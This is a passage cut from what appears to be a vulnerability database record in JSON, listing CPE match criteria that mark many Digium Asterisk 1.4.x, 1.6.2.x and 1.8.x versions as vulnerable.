              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "522733A7-E89E-4BFD-AC93-D6882636E880",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2FAC47DD-B613-43E4-B9BF-6120B81D9789",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "86D20CB5-60E8-405E-B387-CF80C7DA5E07",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "71AB5A01-5961-4053-9111-CF32C6473A00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "77D8E1DC-041F-4B87-AF9A-E0EC4D6A4BD8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7CCCB892-30CE-4BEF-904E-5D957F94D0EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EFBB9A6-DD1D-436E-919F-74A3E4F40396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "054E34C8-B6A5-48C7-938E-D3C268E0E8BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1DCECA72-533A-4A95-AB19-20C5F09A1B01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0E2309F8-AFEE-4150-99D1-BA606432ED73",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "7785F282-BFA0-400A-8398-872ACCA4BF37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1278D3FB-78C6-4F7D-A845-0A93D4F6E2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "C00A6EFB-A848-46D3-AAD7-FD8140007E42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB6E3972-5C53-4B6D-BFE1-67E1122EA013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "048617A0-A783-4519-A947-35220D4CD786",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "DD493A41-E686-444C-A34E-412804510F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D25FD6-CC3A-4AB0-B7B1-67D07386F99D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C402E9E-09CC-4EFA-AC27-156437B05B22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C8A41F9C-D2F4-47A9-80CD-2B1BF6B0CB63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "627FF5B9-E5A8-4DBC-A891-B175011E72A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6146EB2E-BA32-4408-B10B-A711EC39C580",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "1C863324-05AE-4FCA-BD2E-39040A468DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "A85F51E7-0AAE-4F3B-9F90-BD2E31255822",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "315FB0D4-D4A4-4369-BFB8-F2CAEB429015",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DC74D6C5-F410-4B68-AF92-056B727193A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "B70911F8-A526-4600-8198-03FF4CCB28DE",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "63C8DBF5-6992-4618-BD2D-56F1F98EAE3C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEED6C07-CFB7-44DC-9A41-9B6271942123",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0864DAF9-B7FA-4018-99F4-F2A7AA6FBBB0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "694B257B-E73B-4534-B316-87284FA45534",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "418FD91F-014E-4529-8D72-D3FB27788EEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D213EC93-0D4F-4BD9-9F13-9A9E705135EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E9D2091-B292-4D6E-A91F-58D24BD5A5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.17.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "CFF196A0-87E1-4DD2-8CDA-B19EB6F71312",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F59B7C5-8EF3-495E-9A91-9C96E6DF41E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D9020FF4-645B-4E98-8CB0-3F8DF7C5841B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F0B515F-6C5B-4A32-BE6E-3B154B4340CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "679A2262-1C6B-4549-84A9-878D7FA502F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B7F9F0-A597-42BC-AD54-FAD928B7A332",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "76A47DCB-689A-4BD5-B3A5-7DA20052A3B6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "FC1188DA-6C27-48D2-9CE7-74D77B24EE9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "A93B8F91-5C56-44DE-AE29-8468E853759F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "BF7F4D02-7C8E-403C-A53E-A5F8C07F33A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "D85031A3-3444-4650-905D-721F1EBAA24F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F0AC2B3-6E8A-4B26-8A6C-792D9E5072C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC8D6D4-A389-4A78-8DA8-351A9CB896E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E979AC4-58EA-4297-9F90-350924BBE440",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "3A58CCD3-4A0C-468B-85F2-59A52B7293A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "3542DB91-8487-49D6-AA15-E8FD9D6B99D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BA4F3F1-C3F1-4E15-A854-9BB84E33E4AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "661D710E-79F0-4E98-B35B-ED0549D35C24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68291ADE-F9D1-427B-B150-FDA7F2F4788B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
